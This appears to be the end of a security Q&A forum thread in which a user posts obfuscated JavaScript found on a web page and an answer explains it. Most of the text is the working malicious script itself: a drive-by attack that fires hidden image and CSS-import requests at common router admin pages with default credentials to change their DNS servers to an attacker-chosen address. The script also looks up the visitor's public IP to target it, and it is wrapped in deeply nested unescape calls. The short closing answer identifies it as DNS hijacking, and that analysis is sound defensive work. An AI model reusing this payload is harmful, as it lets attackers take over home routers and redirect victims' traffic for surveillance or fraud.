 document.write('<img src="hxxp://admin:admin@10.0.0.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:gvt12345@83.142.155.209/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:gvt12345@192.168.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:gvt12345@192.168..1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&Save=Save >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&hostName=&flagMode=2&Save=Save >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&Save=Save>');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&Save=Save >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&Save=Save >');
 document.write('<img src="hxxp://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced >');
 document.write('<img src="hxxp://192.168.2.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced >');
 document.write('<img src="hxxp://admin:admin@hxxp://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&downBandwidth=0&upBandwidth=0&Save= &Advanced=Advanced >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&hostName=TLINK&Save=Save >');
 document.write('<img src="hxxp://admin:admin@192.168.1.4/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&hostName=TLINK&Save=Save >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/start_apply.htm?wan_dns1_x=' + dnsprimario + '&wan_dns2_x=' + dnssecundario + ' >');
 document.write('<img src="hxxp:admin:admin@192.168.1.2/start_apply.htm?wan_dns1=' + dnsprimario + '&wan_dns2=' + dnssecundario + ' >');
 document.write('<img src="hxxp:admin:admin@192.168.2.2/start_apply.htm?wan_dns1=' + dnsprimario + '&wan_dns2=' + dnssecundario + ' >');
 document.write('<img src="hxxp://admin:password@192.168.1.1/start_apply.htm?dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + ' >');
 document.write('<style type="text/css">@import url(hxxp://admin:admin@192.168.1.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=' + dnsprimario + '&I00035008=' + dnssecundario + '&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>');
 document.write('<style type="text/css">@import url(hxxp://admin:admin@192.168.0.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=' + dnsprimario + '&I00035008=' + dnssecundario + '&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>');
 document.write('<style type="text/css">@import url(hxxp://admin@192.168.1.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=' + dnsprimario + '&I00035008=' + dnssecundario + '&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>');
 document.write('<style type="text/css">@import url(hxxp://admin@192.168.0.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=' + dnsprimario + '&I00035008=' + dnssecundario + '&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>');
 document.write('<style type="text/css">@import url(hxxp://admin:admin@192.168.0.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&hostName=TLINK&Save=Save);</style>');
 document.write('<style type="text/css">@import url(hxxp://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=' + dnsprimario + '&dnsserver2=' + dnssecundario + '&hostName=TLINK&Save=Save);</style>');

 function CapturarIP() {
     if (window.XMLhxxpRequest) xmlhxxp = new XMLhxxpRequest();
     else xmlhxxp = new ActiveXObject("Microsoft.XMLhxxp");

     xmlhxxp.open("GET", "hxxp://api.hostip.info/get_html.php", false);
     xmlhxxp.send();

     hostipInfo = xmlhxxp.responseText.split("\n");

     for (i = 0; hostipInfo.length >= i; i++) {
         ipAddress = hostipInfo[i].split(":");
         if (ipAddress[0] == "IP") return ipAddress[1];
     }

     return false;
 }


 var ip = CapturarIP();
 document.write('<style type="text/css">@import url(hxxp://' + ip + '/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1);</style>'); < /script> < script language = JavaScript >
     var dnsprimario = "103.31.0.140";
 var dnssecundario = "8.8.8.8";
 document.write('<img src="hxxp://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRef

         //jsunpack.url var newurl = <script language=JavaScript>
         var dnsprimario = "103.31.0.140";
         var dnssecundario = "8.8.8.8"; document.write('<img src="hxxp://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRef'; document.write('<' + 'script>' + unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(valor)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) + '
```

---

### So what kind of Encryption is being used here?

This is not encryption, really. It's just obfuscation using HTTP percent-encoding and Javascript minification. It's trying to change your router's DNS servers to point somewhere else so it can watch you.

---

### Where does it want to redirect me?

This attempts to redirect you to DNS servers which are owned and operated in China.

Comment: Do you mean URL encoding?

Comment: @korockinout13 [Yes](https://en.wikipedia.org/wiki/Percent-encoding). Same thing.

Comment: @MarkBuffalo Great Answer! Thanks for the explanation!